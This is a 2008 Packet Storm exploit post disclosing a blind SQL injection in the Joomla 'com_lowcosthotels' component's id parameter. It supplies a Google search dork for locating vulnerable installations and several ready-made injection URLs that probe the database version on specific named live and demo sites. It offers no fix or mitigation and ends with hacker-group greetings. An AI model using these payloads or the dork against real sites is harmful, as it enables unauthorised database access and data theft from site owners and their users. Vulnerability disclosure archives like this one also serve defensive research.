Joomla Low Cost Hotels Component Blind SQL Injection

2008-12-31T00:00:00
ID PACKETSTORM:73399
Type packetstorm
Reporter Hussin X
Modified 2008-12-31T00:00:00

Description

                                        
                                            `Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability  
___________________________________  
  
Author: Hussin X  
  
Home : www.IQ-TY.com & www.TrYaG.cc  
  
___________________________________  
  
script : http://www.joomlahbs.com/  
  
DorK : inurl:index.php?option=com_lowcosthotels  
  
Demo :  
_______  
  
  
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5  
  
  
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4  
  
  
or  
  
  
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5  
  
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4  
  
  
____________________________( Greetz )_________________________________  
|  
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |  
|  
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab  
|  
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|  
|_____________________________________________________________________  
  
_____ ____ __ __ _ ____ ____ ____  
|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___|  
| | | |_) | \ V / / _ \ | | _ | | | |  
| | | _ < | | / ___ \ | |_| | _ | |___ | |___  
|_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____|  
  
`